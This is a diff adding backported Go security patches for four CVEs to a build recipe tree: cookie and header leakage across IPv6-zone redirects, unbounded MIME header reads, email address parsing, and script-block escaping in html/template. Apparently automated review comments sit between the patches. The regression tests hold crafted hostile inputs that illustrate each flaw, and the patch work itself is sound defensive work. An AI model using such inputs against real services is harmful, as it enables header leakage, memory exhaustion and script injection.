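+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
@@ -0,0 +1,121 @@
+From 20586c0dbe03d144f914155f879fa5ee287591a1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 11 Jan 2024 11:31:57 -0800
+Subject: [PATCH] [release-branch.go1.21] net/http, net/http/cookiejar: avoid
+ subdomain matches on IPv6 zones
+
+When deciding whether to forward cookies or sensitive headers
+across a redirect, do not attempt to interpret an IPv6 address
+as a domain name.
+
+Avoids a case where a maliciously-crafted redirect to an
+IPv6 address with a scoped addressing zone could be
+misinterpreted as a within-domain redirect. For example,
+we could interpret "::1%.www.example.com" as a subdomain
+of "www.example.com".
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes CVE-2023-45289
+Fixes #65385
+For #65065
+
+Change-Id: I8f463f59f0e700c8a18733d2b264a8bcb3a19599
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2131938
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173775
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569239
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/20586c0dbe03d144f914155f879fa5ee287591a1]
+CVE: CVE-2023-45289
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/client.go | 6 ++++++
+ src/net/http/client_test.go | 1 +
+ src/net/http/cookiejar/jar.go | 7 +++++++
+ src/net/http/cookiejar/jar_test.go | 10 ++++++++++
+ 4 files changed, 24 insertions(+)
+
+diff --git a/src/net/http/client.go b/src/net/http/client.go
+index a496f1c..2031834 100644
+--- a/src/net/http/client.go
++++ b/src/net/http/client.go
+@@ -973,6 +973,12 @@ func isDomainOrSubdomain(sub, parent string) bool {
+ if sub == parent {
+ return true
+ }
++ // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).
++ // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.
++ // For example, "::1%.www.example.com" is not a subdomain of "www.example.com".
++ if strings.ContainsAny(sub, ":%") {
++ return false
++ }
+ // If sub is "foo.example.com" and parent is "example.com",
+ // that means sub must end in "."+parent.
+ // Do it without allocating.
+diff --git a/src/net/http/client_test.go b/src/net/http/client_test.go
+index 2b4f53f..442fe35 100644
+--- a/src/net/http/client_test.go
++++ b/src/net/http/client_test.go
+@@ -1703,6 +1703,7 @@ func TestShouldCopyHeaderOnRedirect(t *testing.T) {
+ {"cookie2", "http://foo.com/", "http://bar.com/", false},
+ {"authorization", "http://foo.com/", "http://bar.com/", false},
+ {"www-authenticate", "http://foo.com/", "http://bar.com/", false},
++ {"authorization", "http://foo.com/", "http://[::1%25.foo.com]/", false},
+
+ // But subdomains should work:
+ {"www-authenticate", "http://foo.com/", "http://foo.com/", true},
+diff --git a/src/net/http/cookiejar/jar.go b/src/net/http/cookiejar/jar.go
+index 9f19917..18cbfc2 100644
+--- a/src/net/http/cookiejar/jar.go
++++ b/src/net/http/cookiejar/jar.go
+@@ -356,6 +356,13 @@ func jarKey(host string, psl PublicSuffixList) string {
+
+ // isIP reports whether host is an IP address.
+ func isIP(host string) bool {
++ if strings.ContainsAny(host, ":%") {
++ // Probable IPv6 address.
++ // Hostnames can't contain : or %, so this is definitely not a valid host.
++ // Treating it as an IP is the more conservative option, and avoids the risk
++ // of interpeting ::1%.www.example.com as a subtomain of www.example.com.
++ return true
++ }
+ return net.ParseIP(host) != nil
+ }
+
+diff --git a/src/net/http/cookiejar/jar_test.go b/src/net/http/cookiejar/jar_test.go
+index 47fb1ab..fd8d40e 100644
+--- a/src/net/http/cookiejar/jar_test.go
++++ b/src/net/http/cookiejar/jar_test.go
+@@ -251,6 +251,7 @@ var isIPTests = map[string]bool{
+ "127.0.0.1": true,
+ "1.2.3.4": true,
+ "2001:4860:0:2001::68": true,
++ "::1%zone": true,
+ "example.com": false,
+ "1.1.1.300": false,
+ "www.foo.bar.net": false,
+@@ -613,6 +614,15 @@ var basicsTests = [...]jarTest{
+ {"http://www.host.test:1234/", "a=1"},
+ },
+ },
++ {
++ "IPv6 zone is not treated as a host.",
++ "https://example.com/",
++ []string{"a=1"},
++ "a=1",
++ []query{
++ {"https://[::1%25.example.com]:80/", ""},
++ },
++ },
+ }
+
+ func TestBasics(t *testing.T) {
+--
+2.25.1
+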
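Review bot: The comment added above the new guard in `isDomainOrSubdomain` (client.go hunk) mentions only `:`, while the check is `strings.ContainsAny(sub, ":%")`, so a bare `%` also short-circuits to `false`. Naming both characters keeps the security rationale readable, e.g. `// If sub contains ':' or '%', it is an IPv6 literal or zone and never a hostname.` The `isIP` comment in jar.go carries two typos (`interpeting`, `subtomain`); they appear to come from the referenced upstream commit, so leaving them keeps the backport comparable with it. Both functions continue outside their hunks.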
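--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
@@ -0,0 +1,271 @@
+From bf80213b121074f4ad9b449410a4d13bae5e9be0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 16 Jan 2024 15:37:52 -0800
+Subject: [PATCH] [release-branch.go1.21] net/textproto, mime/multipart: avoid
+ unbounded read in MIME header
+
+mime/multipart.Reader.ReadForm allows specifying the maximum amount
+of memory that will be consumed by the form. While this limit is
+correctly applied to the parsed form data structure, it was not
+being applied to individual header lines in a form.
+
+For example, when presented with a form containing a header line
+that never ends, ReadForm will continue to read the line until it
+runs out of memory.
+
+Limit the amount of data consumed when reading a header.
+
+Fixes CVE-2023-45290
+Fixes #65389
+For #65383
+
+Change-Id: I7f9264d25752009e95f6b2c80e3d76aaf321d658
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2134435
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173776
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569240
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf80213b121074f4ad9b449410a4d13bae5e9be0]
+CVE: CVE-2023-45290
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata_test.go | 42 +++++++++++++++++++++++++
+ src/net/textproto/reader.go | 48 ++++++++++++++++++++---------
+ src/net/textproto/reader_test.go | 12 ++++++++
+ 3 files changed, 87 insertions(+), 15 deletions(-)
+
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index c78eeb7..f729da6 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -421,6 +421,48 @@ func TestReadFormLimits(t *testing.T) {
+ }
+ }
+
++func TestReadFormEndlessHeaderLine(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ prefix string
++ }{{
++ name: "name",
++ prefix: "X-",
++ }, {
++ name: "value",
++ prefix: "X-Header: ",
++ }, {
++ name: "continuation",
++ prefix: "X-Header: foo\r\n ",
++ }} {
++ t.Run(test.name, func(t *testing.T) {
++ const eol = "\r\n"
++ s := `--boundary` + eol
++ s += `Content-Disposition: form-data; name="a"` + eol
++ s += `Content-Type: text/plain` + eol
++ s += test.prefix
++ fr := io.MultiReader(
++ strings.NewReader(s),
++ neverendingReader('X'),
++ )
++ r := NewReader(fr, "boundary")
++ _, err := r.ReadForm(1 << 20)
++ if err != ErrMessageTooLarge {
++ t.Fatalf("ReadForm(1 << 20): %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++type neverendingReader byte
++
++func (r neverendingReader) Read(p []byte) (n int, err error) {
++ for i := range p {
++ p[i] = byte(r)
++ }
++ return len(p), nil
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index ad2d777..cea6613 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -17,6 +17,10 @@ import (
+ "sync"
+ )
+
++// TODO: This should be a distinguishable error (ErrMessageTooLarge)
++// to allow mime/multipart to detect it.
++var errMessageTooLarge = errors.New("message too large")
++
+ // A Reader implements convenience methods for reading requests
+ // or responses from a text protocol network connection.
+ type Reader struct {
+@@ -38,13 +42,13 @@ func NewReader(r *bufio.Reader) *Reader {
+ // ReadLine reads a single line from r,
+ // eliding the final \n or \r\n from the returned string.
+ func (r *Reader) ReadLine() (string, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ return string(line), err
+ }
+
+ // ReadLineBytes is like ReadLine but returns a []byte instead of a string.
+ func (r *Reader) ReadLineBytes() ([]byte, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -53,7 +57,10 @@ func (r *Reader) ReadLineBytes() ([]byte, error) {
+ return line, err
+ }
+
+-func (r *Reader) readLineSlice() ([]byte, error) {
++// readLineSlice reads a single line from r,
++// up to lim bytes long (or unlimited if lim is less than 0),
++// eliding the final \r or \r\n from the returned string.
++func (r *Reader) readLineSlice(lim int64) ([]byte, error) {
+ r.closeDot()
+ var line []byte
+ for {
+@@ -61,6 +68,9 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ if err != nil {
+ return nil, err
+ }
++ if lim >= 0 && int64(len(line))+int64(len(l)) > lim {
++ return nil, errMessageTooLarge
++ }
+ // Avoid the copy if the first call produced a full line.
+ if line == nil && !more {
+ return l, nil
+@@ -93,7 +103,7 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ // A line consisting of only white space is never continued.
+ //
+ func (r *Reader) ReadContinuedLine() (string, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ return string(line), err
+ }
+
+@@ -114,7 +124,7 @@ func trim(s []byte) []byte {
+ // ReadContinuedLineBytes is like ReadContinuedLine but
+ // returns a []byte instead of a string.
+ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -127,13 +137,14 @@ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+ // returning a byte slice with all lines. The validateFirstLine function
+ // is run on the first read line, and if it returns an error then this
+ // error is returned from readContinuedLineSlice.
+-func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([]byte, error) {
++// It reads up to lim bytes of data (or unlimited if lim is less than 0).
++func (r *Reader) readContinuedLineSlice(lim int64, validateFirstLine func([]byte) error) ([]byte, error) {
+ if validateFirstLine == nil {
+ return nil, fmt.Errorf("missing validateFirstLine func")
+ }
+
+ // Read the first line.
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(lim)
+ if err != nil {
+ return nil, err
+ }
+@@ -161,13 +172,21 @@ func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([
+ // copy the slice into buf.
+ r.buf = append(r.buf[:0], trim(line)...)
+
++ if lim < 0 {
++ lim = math.MaxInt64
++ }
++ lim -= int64(len(r.buf))
++
+ // Read continuation lines.
+ for r.skipSpace() > 0 {
+- line, err := r.readLineSlice()
++ r.buf = append(r.buf, ' ')
++ if int64(len(r.buf)) >= lim {
++ return nil, errMessageTooLarge
++ }
++ line, err := r.readLineSlice(lim - int64(len(r.buf)))
+ if err != nil {
+ break
+ }
+- r.buf = append(r.buf, ' ')
+ r.buf = append(r.buf, trim(line)...)
+ }
+ return r.buf, nil
+@@ -512,7 +531,8 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+- line, err := r.readLineSlice()
++ const errorLimit = 80 // arbitrary limit on how much of the line we'll quote
++ line, err := r.readLineSlice(errorLimit)
+ if err != nil {
+ return m, err
+ }
+@@ -520,7 +540,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+
+ for {
+- kv, err := r.readContinuedLineSlice(mustHaveFieldNameColon)
++ kv, err := r.readContinuedLineSlice(maxMemory, mustHaveFieldNameColon)
+ if len(kv) == 0 {
+ return m, err
+ }
+@@ -541,7 +561,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ maxHeaders--
+ if maxHeaders < 0 {
+- return nil, errors.New("message too large")
++ return nil, errMessageTooLarge
+ }
+
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+@@ -567,9 +587,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+ maxMemory -= int64(len(value))
+ if maxMemory < 0 {
+- // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+- // to allow mime/multipart to detect it.
+- return m, errors.New("message too large")
++ return m, errMessageTooLarge
+ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3ae0de1..db1ed91 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -34,6 +34,18 @@ func TestReadLine(t *testing.T) {
+ }
+ }
+
++func TestReadLineLongLine(t *testing.T) {
++ line := strings.Repeat("12345", 10000)
++ r := reader(line + "\r\n")
++ s, err := r.ReadLine()
++ if err != nil {
++ t.Fatalf("Line 1: %v", err)
++ }
++ if s != line {
++ t.Fatalf("%v-byte line does not match expected %v-byte line", len(s), len(line))
++ }
++}
++
+ func TestReadContinuedLine(t *testing.T) {
+ r := reader("line1\nline\n 2\nline3\n")
+ s, err := r.ReadContinuedLine()
+--
+2.25.1
+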
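Review bot: In the continuation loop of `readContinuedLineSlice` (reader.go hunk at -161,13), an error from `r.readLineSlice(lim - int64(len(r.buf)))`, including `errMessageTooLarge`, is discarded by the `break`, and the function then returns the partial `r.buf` with a nil error. The limit presumably trips again on the next read of the same stream, but the hunk does not show that, so a why-comment on the `break` would help, e.g. `// err is dropped here; if that is intended, a size overrun is expected to resurface on the caller's next read.` Separately, the new doc comment on `readLineSlice` says it elides `\r or \r\n`, where `ReadLine` just above says `\n or \r\n`. `math.MaxInt64` is used in this hunk while the import hunk shown only adds the error variable, so confirm `math` is already imported in the 1.14 tree.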
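--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
@@ -0,0 +1,205 @@
+From 5330cd225ba54c7dc78c1b46dcdf61a4671a632c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 10 Jan 2024 11:02:14 -0800
+Subject: [PATCH] [release-branch.go1.22] net/mail: properly handle special
+ characters in phrase and obs-phrase
+
+Fixes a couple of misalignments with RFC 5322 which introduce
+significant diffs between (mostly) conformant parsers.
+
+This change reverts the changes made in CL50911, which allowed certain
+special RFC 5322 characters to appear unquoted in the "phrase" syntax.
+It is unclear why this change was made in the first place, and created
+a divergence from comformant parsers. In particular this resulted in
+treating comments in display names incorrectly.
+
+Additionally properly handle trailing malformed comments in the group
+syntax.
+
+For #65083
+Fixed #65849
+
+Change-Id: I00dddc044c6ae3381154e43236632604c390f672
+Reviewed-on: https://go-review.googlesource.com/c/go/+/555596
+Reviewed-by: Damien Neil <dneil@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/566215
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5330cd225ba54c7dc78c1b46dcdf61a4671a632c]
+CVE: CVE-2024-24784
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/net/mail/message.go | 30 +++++++++++++++------------
+ src/net/mail/message_test.go | 40 ++++++++++++++++++++++++++----------
+ 2 files changed, 46 insertions(+), 24 deletions(-)
+
+diff --git a/src/net/mail/message.go b/src/net/mail/message.go
+index af516fc30f470..fc2a9e46f811b 100644
+--- a/src/net/mail/message.go
++++ b/src/net/mail/message.go
+@@ -280,7 +280,7 @@ func (a *Address) String() string {
+ // Add quotes if needed
+ quoteLocal := false
+ for i, r := range local {
+- if isAtext(r, false, false) {
++ if isAtext(r, false) {
+ continue
+ }
+ if r == '.' {
+@@ -444,7 +444,7 @@ func (p *addrParser) parseAddress(handleGroup bool) ([]*Address, error) {
+ if !p.consume('<') {
+ atext := true
+ for _, r := range displayName {
+- if !isAtext(r, true, false) {
++ if !isAtext(r, true) {
+ atext = false
+ break
+ }
+@@ -479,7 +479,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ // handle empty group.
+ p.skipSpace()
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ return group, nil
+ }
+
+@@ -496,7 +498,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ return nil, errors.New("mail: misformatted parenthetical comment")
+ }
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ break
+ }
+ if !p.consume(',') {
+@@ -566,6 +570,12 @@ func (p *addrParser) consumePhrase() (phrase string, err error) {
+ var words []string
+ var isPrevEncoded bool
+ for {
++ // obs-phrase allows CFWS after one word
++ if len(words) > 0 {
++ if !p.skipCFWS() {
++ return "", errors.New("mail: misformatted parenthetical comment")
++ }
++ }
+ // word = atom / quoted-string
+ var word string
+ p.skipSpace()
+@@ -661,7 +671,6 @@ Loop:
+ // If dot is true, consumeAtom parses an RFC 5322 dot-atom instead.
+ // If permissive is true, consumeAtom will not fail on:
+ // - leading/trailing/double dots in the atom (see golang.org/issue/4938)
+-// - special characters (RFC 5322 3.2.3) except '<', '>', ':' and '"' (see golang.org/issue/21018)
+ func (p *addrParser) consumeAtom(dot bool, permissive bool) (atom string, err error) {
+ i := 0
+
+@@ -672,7 +681,7 @@ Loop:
+ case size == 1 && r == utf8.RuneError:
+ return "", fmt.Errorf("mail: invalid utf-8 in address: %q", p.s)
+
+- case size == 0 || !isAtext(r, dot, permissive):
++ case size == 0 || !isAtext(r, dot):
+ break Loop
+
+ default:
+@@ -850,18 +859,13 @@ func (e charsetError) Error() string {
+
+ // isAtext reports whether r is an RFC 5322 atext character.
+ // If dot is true, period is included.
+-// If permissive is true, RFC 5322 3.2.3 specials is included,
+-// except '<', '>', ':' and '"'.
+-func isAtext(r rune, dot, permissive bool) bool {
++func isAtext(r rune, dot bool) bool {
+ switch r {
+ case '.':
+ return dot
+
+ // RFC 5322 3.2.3. specials
+- case '(', ')', '[', ']', ';', '@', '\\', ',':
+- return permissive
+-
+- case '<', '>', '"', ':':
++ case '(', ')', '<', '>', '[', ']', ':', ';', '@', '\\', ',', '"': // RFC 5322 3.2.3. specials
+ return false
+ }
+ return isVchar(r)
+diff --git a/src/net/mail/message_test.go b/src/net/mail/message_test.go
+index 1e1bb4092f659..1f2f62afbf406 100644
+--- a/src/net/mail/message_test.go
++++ b/src/net/mail/message_test.go
+@@ -385,8 +385,11 @@ func TestAddressParsingError(t *testing.T) {
+ 13: {"group not closed: null@example.com", "expected comma"},
+ 14: {"group: first@example.com, second@example.com;", "group with multiple addresses"},
+ 15: {"john.doe", "missing '@' or angle-addr"},
+- 16: {"john.doe@", "no angle-addr"},
++ 16: {"john.doe@", "missing '@' or angle-addr"},
+ 17: {"John Doe@foo.bar", "no angle-addr"},
++ 18: {" group: null@example.com; (asd", "misformatted parenthetical comment"},
++ 19: {" group: ; (asd", "misformatted parenthetical comment"},
++ 20: {`(John) Doe <jdoe@machine.example>`, "missing word in phrase:"},
+ }
+
+ for i, tc := range mustErrTestCases {
+@@ -436,24 +439,19 @@ func TestAddressParsing(t *testing.T) {
+ Address: "john.q.public@example.com",
+ }},
+ },
+- {
+- `"John (middle) Doe" <jdoe@machine.example>`,
+- []*Address{{
+- Name: "John (middle) Doe",
+- Address: "jdoe@machine.example",
+- }},
+- },
++ // Comment in display name
+ {
+ `John (middle) Doe <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John (middle) Doe",
++ Name: "John Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
++ // Display name is quoted string, so comment is not a comment
+ {
+- `John !@M@! Doe <jdoe@machine.example>`,
++ `"John (middle) Doe" <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John !@M@! Doe",
++ Name: "John (middle) Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
+@@ -788,6 +786,26 @@ func TestAddressParsing(t *testing.T) {
+ },
+ },
+ },
++ // Comment in group display name
++ {
++ `group (comment:): a@example.com, b@example.com;`,
++ []*Address{
++ {
++ Address: "a@example.com",
++ },
++ {
++ Address: "b@example.com",
++ },
++ },
++ },
++ {
++ `x(:"):"@a.example;("@b.example;`,
++ []*Address{
++ {
++ Address: `@a.example;(@b.example`,
++ },
++ },
++ },
+ }
+ for _, test := range tests {
+ if len(test.exp) == 1 {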
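Review bot: The patch header has no `---` separator between the `Signed-off-by:` trailer (line 31) and the diffstat (line 33), unlike the other CVE patches added in this commit; inserting a `---` line after the trailer keeps the diffstat out of the message if the patch is ever applied with a git-based tool. In the `isAtext` hunk the label `// RFC 5322 3.2.3. specials` now appears twice, once above the `case` and once trailing it, and one of them can go. The test changes also show a behaviour shift for callers: `John (middle) Doe <…>` now yields the name `John Doe`, and the unquoted `John !@M@! Doe` case is dropped, which is worth stating in the commit message for a stable branch.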
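--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
@@ -0,0 +1,197 @@
+From 3643147a29352ca2894fd5d0d2069bc4b4335a7e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 14 Feb 2024 17:18:36 -0800
+Subject: [PATCH] [release-branch.go1.21] html/template: escape additional
+ tokens in MarshalJSON errors
+
+Escape "</script" and "<!--" in errors returned from MarshalJSON errors
+when attempting to marshal types in script blocks. This prevents any
+user controlled content from prematurely terminating the script block.
+
+Updates #65697
+Fixes #65968
+
+Change-Id: Icf0e26c54ea7d9c1deed0bff11b6506c99ddef1b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/564196
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit ccbc725f2d678255df1bd326fa511a492aa3a0aa)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/567515
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/3643147a29352ca2894fd5d0d2069bc4b4335a7e]
+CVE: CVE-2024-24785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 22 ++++++++-
+ src/html/template/js_test.go | 96 ++++++++++++++++++++----------------
+ 2 files changed, 74 insertions(+), 44 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 35994f0..4d3b25d 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -171,13 +171,31 @@ func jsValEscaper(args ...interface{}) string {
+ // cyclic data. This may be an unacceptable DoS risk.
+ b, err := json.Marshal(a)
+ if err != nil {
+- // Put a space before comment so that if it is flush against
++ // While the standard JSON marshaller does not include user controlled
++ // information in the error message, if a type has a MarshalJSON method,
++ // the content of the error message is not guaranteed. Since we insert
++ // the error into the template, as part of a comment, we attempt to
++ // prevent the error from either terminating the comment, or the script
++ // block itself.
++ //
++ // In particular we:
++ // * replace "*/" comment end tokens with "* /", which does not
++ // terminate the comment
++ // * replace "</script" with "\x3C/script", and "<!--" with
++ // "\x3C!--", which prevents confusing script block termination
++ // semantics
++ //
++ // We also put a space before the comment so that if it is flush against
+ // a division operator it is not turned into a line comment:
+ // x/{{y}}
+ // turning into
+ // x//* error marshaling y:
+ // second line of error message */null
+- return fmt.Sprintf(" /* %s */null ", strings.ReplaceAll(err.Error(), "*/", "* /"))
++ errStr := err.Error()
++ errStr = strings.ReplaceAll(errStr, "*/", "* /")
++ errStr = strings.ReplaceAll(errStr, "</script", `\x3C/script`)
++ errStr = strings.ReplaceAll(errStr, "<!--", `\x3C!--`)
++ return fmt.Sprintf(" /* %s */null ", errStr)
+ }
+
+ // TODO: maybe post-process output to prevent it from containing
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index de9ef28..3fc3baf 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "bytes"
+ "math"
+ "strings"
+@@ -104,61 +105,72 @@ func TestNextJsCtx(t *testing.T) {
+ }
+ }
+
++type jsonErrType struct{}
++
++func (e *jsonErrType) MarshalJSON() ([]byte, error) {
++ return nil, errors.New("beep */ boop </script blip <!--")
++}
++
+ func TestJSValEscaper(t *testing.T) {
+ tests := []struct {
+- x interface{}
+- js string
++ x interface{}
++ js string
++ skipNest bool
+ }{
+- {int(42), " 42 "},
+- {uint(42), " 42 "},
+- {int16(42), " 42 "},
+- {uint16(42), " 42 "},
+- {int32(-42), " -42 "},
+- {uint32(42), " 42 "},
+- {int16(-42), " -42 "},
+- {uint16(42), " 42 "},
+- {int64(-42), " -42 "},
+- {uint64(42), " 42 "},
+- {uint64(1) << 53, " 9007199254740992 "},
++ {int(42), " 42 ", false},
++ {uint(42), " 42 ", false},
++ {int16(42), " 42 ", false},
++ {uint16(42), " 42 ", false},
++ {int32(-42), " -42 ", false},
++ {uint32(42), " 42 ", false},
++ {int16(-42), " -42 ", false},
++ {uint16(42), " 42 ", false},
++ {int64(-42), " -42 ", false},
++ {uint64(42), " 42 ", false},
++ {uint64(1) << 53, " 9007199254740992 ", false},
+ // ulp(1 << 53) > 1 so this loses precision in JS
+ // but it is still a representable integer literal.
+- {uint64(1)<<53 + 1, " 9007199254740993 "},
+- {float32(1.0), " 1 "},
+- {float32(-1.0), " -1 "},
+- {float32(0.5), " 0.5 "},
+- {float32(-0.5), " -0.5 "},
+- {float32(1.0) / float32(256), " 0.00390625 "},
+- {float32(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {float64(1.0), " 1 "},
+- {float64(-1.0), " -1 "},
+- {float64(0.5), " 0.5 "},
+- {float64(-0.5), " -0.5 "},
+- {float64(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {"", `""`},
+- {"foo", `"foo"`},
++ {uint64(1)<<53 + 1, " 9007199254740993 ", false},
++ {float32(1.0), " 1 ", false},
++ {float32(-1.0), " -1 ", false},
++ {float32(0.5), " 0.5 ", false},
++ {float32(-0.5), " -0.5 ", false},
++ {float32(1.0) / float32(256), " 0.00390625 ", false},
++ {float32(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {float64(1.0), " 1 ", false},
++ {float64(-1.0), " -1 ", false},
++ {float64(0.5), " 0.5 ", false},
++ {float64(-0.5), " -0.5 ", false},
++ {float64(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {"", `""`, false},
++ {"foo", `"foo"`, false},
+ // Newlines.
+- {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
++ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`, false},
+ // "\v" == "v" on IE 6 so use "\u000b" instead.
+- {"\t\x0b", `"\t\u000b"`},
+- {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+- {[]interface{}{}, "[]"},
+- {[]interface{}{42, "foo", nil}, `[42,"foo",null]`},
+- {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`},
+- {"<!--", `"\u003c!--"`},
+- {"-->", `"--\u003e"`},
+- {"<![CDATA[", `"\u003c![CDATA["`},
+- {"]]>", `"]]\u003e"`},
+- {"</script", `"\u003c/script"`},
+- {"\U0001D11E", "\"\U0001D11E\""}, // or "\uD834\uDD1E"
+- {nil, " null "},
++ {"\t\x0b", `"\t\u000b"`, false},
++ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`, false},
++ {[]interface{}{}, "[]", false},
++ {[]interface{}{42, "foo", nil}, `[42,"foo",null]`, false},
++ {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`, false},
++ {"<!--", `"\u003c!--"`, false},
++ {"-->", `"--\u003e"`, false},
++ {"<![CDATA[", `"\u003c![CDATA["`, false},
++ {"]]>", `"]]\u003e"`, false},
++ {"</script", `"\u003c/script"`, false},
++ {"\U0001D11E", "\"\U0001D11E\"", false}, // or "\uD834\uDD1E"
++ {nil, " null ", false},
++ {&jsonErrType{}, " /* json: error calling MarshalJSON for type *template.jsonErrType: beep * / boop \\x3C/script blip \\x3C!-- */null ", true},
+ }
+
+ for _, test := range tests {
+ if js := jsValEscaper(test.x); js != test.js {
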